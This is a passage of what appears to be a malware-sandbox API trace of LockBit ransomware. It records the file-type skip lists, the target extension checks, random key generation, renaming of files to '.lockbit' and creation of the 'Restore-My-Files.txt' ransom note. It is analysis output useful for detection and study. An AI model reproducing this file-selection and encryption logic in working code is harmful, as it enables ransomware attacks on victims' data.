[0100.685] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.685] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.686] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.686] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.687] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.687] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.687] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00011_.GIF") returned 1 [0100.687] lstrcmpiW (lpString1="ntldr", lpString2="AG00011_.GIF") returned 1 [0100.687] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00011_.GIF") returned 1 [0100.687] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00011_.GIF") returned 1 [0100.687] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00011_.GIF") returned 1 [0100.687] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00011_.GIF") returned 1 [0100.687] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00011_.GIF") returned 1 [0100.688] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.688] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned=".GIF" [0100.688] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.688] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.688] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.689] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.689] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.689] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.689] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.689] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.lockbit") returned 72 [0100.689] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0100.689] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.689] malloc (_Size=0x40068) returned 0x1ff1e60 [0100.690] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7216) returned 1 [0100.690] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0100.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.696] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0100.696] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0100.720] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.720] malloc (_Size=0xa6) returned 0x77d800 [0100.725] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0100.725] free (_Block=0x77d800) [0100.725] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.725] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.725] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.725] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78587200, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78587200, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x3a19, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00021_.GIF", cAlternateFileName="")) returned 1 [0100.725] lstrcmpiW (lpString1=".", lpString2="AG00021_.GIF") returned -1 [0100.725] lstrcmpiW (lpString1="..", lpString2="AG00021_.GIF") returned -1 [0100.725] PathFindExtensionW (pszPath="AG00021_.GIF") returned=".GIF" [0100.725] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.725] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.725] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.725] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.725] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.725] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.725] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.726] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.726] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.726] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.726] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.726] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.726] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.727] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.727] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.727] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.727] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.727] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.728] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.728] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.728] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.728] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.728] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.728] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.728] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00021_.GIF") returned 1 [0100.728] lstrcmpiW (lpString1="ntldr", lpString2="AG00021_.GIF") returned 1 [0100.728] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00021_.GIF") returned 1 [0100.728] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00021_.GIF") returned 1 [0100.728] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00021_.GIF") returned 1 [0100.728] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00021_.GIF") returned 1 [0100.728] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00021_.GIF") returned 1 [0100.728] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.728] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned=".GIF" [0100.729] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.729] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.729] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.729] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.730] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.730] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.730] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.730] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.lockbit") returned 72 [0100.730] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0100.732] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.733] malloc (_Size=0x40068) returned 0x1ff1e60 [0100.733] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14873) returned 1 [0100.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0100.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0100.742] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0100.768] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.768] malloc (_Size=0xa6) returned 0x77d800 [0100.768] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0100.768] free (_Block=0x77d800) [0100.768] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.768] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.768] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.768] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64147500, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64147500, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x1a1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00037_.GIF", cAlternateFileName="")) returned 1 [0100.768] lstrcmpiW (lpString1=".", lpString2="AG00037_.GIF") returned -1 [0100.768] lstrcmpiW (lpString1="..", lpString2="AG00037_.GIF") returned -1 [0100.768] PathFindExtensionW (pszPath="AG00037_.GIF") returned=".GIF" [0100.768] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.768] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.768] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.768] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.768] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.768] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.768] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.769] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.769] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.769] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.769] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.769] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.769] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.769] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.769] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.769] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.770] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.770] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00037_.GIF") returned 1 [0100.770] lstrcmpiW (lpString1="ntldr", lpString2="AG00037_.GIF") returned 1 [0100.770] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00037_.GIF") returned 1 [0100.770] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00037_.GIF") returned 1 [0100.770] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00037_.GIF") returned 1 [0100.771] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00037_.GIF") returned 1 [0100.771] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00037_.GIF") returned 1 [0100.771] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.771] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned=".GIF" [0100.771] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.771] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.771] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.771] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.771] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.771] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.771] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.771] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.772] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.772] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.772] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.772] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.772] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.772] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.772] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.772] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.772] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft 